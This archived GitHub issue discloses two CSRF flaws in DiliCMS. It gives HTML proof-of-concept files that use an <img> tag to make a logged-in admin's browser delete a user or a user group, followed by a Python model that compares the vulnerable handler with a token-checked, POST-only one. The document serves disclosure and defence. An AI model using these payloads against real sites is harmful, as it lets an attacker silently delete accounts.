This repository was archived by the owner on Jan 10, 2019. It is now read-only.

There are two CSRF vulnerabilities that can delete a user or usergroup #60

@Rich4ever

Description


Software Link : https://github.com/chekun/DiliCMS
After the administrator has logged in, open the page.
test.html delete user POC:

<html>
  <body>
    <img src="http://127.0.0.1/DiliCMS/admin/index.php/user/del/1" />
  </body>
</html>

test2.html delete group POC:

<html>
  <body>
    <img src="http://127.0.0.1/DiliCMS/admin/index.php/role/del/2" />
  </body>
</html>
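
Both POCs rely on the same server-side pattern: a state-changing admin action (`user/del/<id>`, `role/del/<id>`) is reachable with a plain GET and checks nothing beyond the session cookie, which the browser attaches to the `<img>` request automatically. The following is an added illustration written for this page, not DiliCMS code and not from the reporter. It models that pattern next to a hardened handler; the `Request` class, the `SESSIONS` store, the handler names, the status codes and the `attacker.example` host are all assumptions made for the example.

```python
"""Model of the reported CSRF pattern and a hardened handler.
Added example for this issue page; not DiliCMS code. All names are assumptions."""
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Request:
    method: str
    path: str                                  # e.g. "/admin/index.php/user/del/1"
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)


# Constructed server state: one logged-in admin session and a small user table.
SESSIONS = {"admin-sess": {"role": "admin", "csrf": secrets.token_hex(16)}}
SITE_ORIGIN = "http://127.0.0.1"


def fresh_users():
    return {1: "alice", 2: "bob"}


def session_of(req):
    return SESSIONS.get(req.cookies.get("sid"))


def vulnerable_user_del(req, users):
    """The pattern in the issue: any authenticated request to user/del/<id>,
    including a GET fired by an <img> tag on an attacker's page, deletes the user."""
    sess = session_of(req)
    if not sess or sess["role"] != "admin":
        return 403
    uid = int(req.path.rsplit("/", 1)[1])
    users.pop(uid, None)
    return 200


def hardened_user_del(req, users):
    """Same action with the checks a reviewer would ask for: accepted only over
    POST, requires a per-session CSRF token compared in constant time, and (as
    defence in depth) rejects a foreign Origin header when one is present."""
    sess = session_of(req)
    if not sess or sess["role"] != "admin":
        return 403
    if req.method != "POST":
        return 405
    origin = req.headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return 403
    token = req.form.get("csrf_token", "")
    if not hmac.compare_digest(token, sess["csrf"]):
        return 403
    uid = int(req.path.rsplit("/", 1)[1])
    users.pop(uid, None)
    return 200


# Constructed request: what test.html's <img> makes the victim's browser send.
CSRF_GET = Request("GET", "/admin/index.php/user/del/1",
                   cookies={"sid": "admin-sess"},
                   headers={"Referer": "http://attacker.example/test.html"})

# Constructed request: an auto-submitted cross-origin form. Cookie present,
# no token, and the browser sets Origin to the attacker's site.
CSRF_POST = Request("POST", "/admin/index.php/user/del/1",
                    cookies={"sid": "admin-sess"},
                    headers={"Origin": "http://attacker.example"})


def legit_post():
    """Constructed request the real admin UI would send: POST from the site's own
    origin carrying the token that was embedded in the admin page for this session."""
    return Request("POST", "/admin/index.php/user/del/1",
                   cookies={"sid": "admin-sess"},
                   form={"csrf_token": SESSIONS["admin-sess"]["csrf"]},
                   headers={"Origin": SITE_ORIGIN})


def demo():
    """Run each request against a fresh user table; return (status, user 1 still present)."""
    results = {}
    for name, handler, req in [("vuln_get", vulnerable_user_del, CSRF_GET),
                               ("hard_get", hardened_user_del, CSRF_GET),
                               ("hard_forged_post", hardened_user_del, CSRF_POST),
                               ("hard_legit_post", hardened_user_del, legit_post())]:
        users = fresh_users()
        results[name] = (handler(req, users), 1 in users)
    return results


if __name__ == "__main__":
    for name, (status, present) in demo().items():
        print(f"{name}: HTTP {status}, user 1 still present: {present}")
```

The GET-based POC succeeds against the vulnerable handler and is refused by the hardened one before any token check runs; a forged cross-origin POST is refused as well. The method restriction alone is not the fix, since an attacker can auto-submit a form; the session-bound token is what stops the forgery. Newer browsers default cookies to `SameSite=Lax`, which blocks the `<img>` GET variant, but that is a client-side mitigation the server cannot rely on.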
